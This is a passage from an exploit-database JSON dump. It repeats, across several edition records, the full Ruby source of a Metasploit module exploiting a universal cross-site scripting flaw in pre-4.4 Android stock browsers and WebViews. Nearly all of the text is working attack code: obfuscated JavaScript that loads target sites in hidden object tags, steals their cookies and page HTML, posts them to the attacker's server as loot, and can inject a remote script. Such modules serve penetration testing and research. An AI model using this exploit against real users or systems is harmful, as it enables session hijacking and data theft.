store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-11T23:22:50", "differentElements": ["modified", "published"], "edition": 51}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T21:32:09", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-12T21:32:09", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T23:21:19", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-12T23:21:19", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-16T15:20:06", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-16T15:20:06", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-16T17:18:53", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-16T17:18:53", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T13:25:44", "history": [], "viewCount": 62, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb"}, "lastseen": "2018-08-19T13:25:44", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-19T15:26:34", "history": [], "viewCount": 63, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = 